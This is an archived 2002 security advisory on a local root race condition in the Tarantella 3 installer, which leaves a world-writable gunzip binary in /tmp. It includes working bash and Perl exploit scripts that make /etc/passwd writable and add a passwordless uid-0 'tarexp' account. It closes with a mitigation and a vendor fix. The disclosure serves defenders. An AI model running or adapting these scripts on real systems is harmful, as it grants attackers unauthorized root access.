TUCoPS :: Linux :: Apps N-Z :: lnx5035.htm

Tarantella local root compromise at installation time via bad tmp practice
28th Jan 2002 [SBWID-5035]
COMMAND

	Tarantella local root  compromise  at  installation  time  via  bad  tmp
	practice

SYSTEMS AFFECTED

	 Tarantella 3

PROBLEM

	\"Larry  W.  Cashdollar\"  in  \"Vapid  Labs\"   [http://vapid.dhs.org/]
	advisory says :
	

	The  installation  script  provided  with  tarentella  handles   utility
	packages during installation insecurely. A root owned binary  \"gunzip\"
	is created  in  /tmp  with  world  writeable  permissions,  the  pid  is
	appended to the filename.
	

	

	TMP_GUNZIP=$TMPDIR/gunzip$$

	

	$ ls -l /tmp/gunzip16152

	- -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

	

	gunzip is extracted:

			    extract gunzip > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE

			    extract gunzip | uncompress > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE

	

	The permissions of gunzip are changed to rwx for all:

		    chmod 777 $TMP_GUNZIP >/dev/null 2>&1

	The binary is used during installation:

		    extract $efilename | $TMP_GUNZIP -q > \"$efilename\"

	

	

	 Exploit

	 =======

	

	There is a race condition between when  gunzip  is  extracted  and  used
	during installation. At which time a malicious local user  could  inject
	code to compromise the system quickly.
	

	$ echo \"#!/bin/sh\" > /tmp/test.sh

	$ echo \"chmod 777 /etc/passwd\" >> /tmp/test.sh

	

	$ cat /tmp/test.sh > /tmp/gunzip16152

	

	I  was  able  to  change  the  permissions  of  /etc/passwd  to  777  by
	performing the above as an unpriviledged user.
	

	In a script :
	

	

	#!/bin/bash

	#Larry W. Cashdollar  lwc@vapid.dhs.org

	#http://vapid.dhs.org

	#Tarantella Enterprise 3 symlink local root Installation exploit

	#For educational purposes only.

	#tested on Linux.  run and wait.

	

	

	echo \"Creating symlink.\"

	

	/bin/ln -s /etc/passwd /tmp/spinning

	

	echo \"Waiting for tarantella installation.\"

	

	while true

	do

	echo -n .

	if [ -w /etc/passwd ]

	then

		echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd

	        su - tarexp

	        exit

	fi

	done

	

	

	-Also-
	

	

	#!/usr/bin/perl -w

	#Another Exploit for tarantella enterprise 3 installation.

	#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002

	#Exploits gunzip$$ binary being created in /tmp with perm 777

	#http://online.securityfocus.com/bid/3966

	#Experimental ext3 kernel mods for preventing/researching race conditions.

	#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

	

	use strict;

	

	`cat  <<  -EOF- > root.sh

	#!/bin/sh

	chmod 777 /etc/passwd

	echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd

	-EOF-`;

	

	my $OUT = \'\';

	

	while(!$OUT) {

		$OUT =  `ps -ax |grep gunzip |grep -v grep`;

	        print \"Found $OUT\\n\";

	}

	

	my @args  = split(\' \',$OUT);

	# Do this with one copy operation. This will break installation of tarantella.

	# should test for -w on /etc/passwd stop and su - tarexp.

	while(1) {

	`cp root.sh $args[4]`;

	}

	

SOLUTION

	Perhaps create a directory in /tmp or /var/tmp and  use  that  directory
	as a work place?
	

	umask 077

	mkdir /tmp/workdir

	

	

	 Update (05 April 2002)

	 ======

	

	Tarantella addressed these issues in a security bulletin:
	

	http://www.tarantella.com/security/bulletin-04.html

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH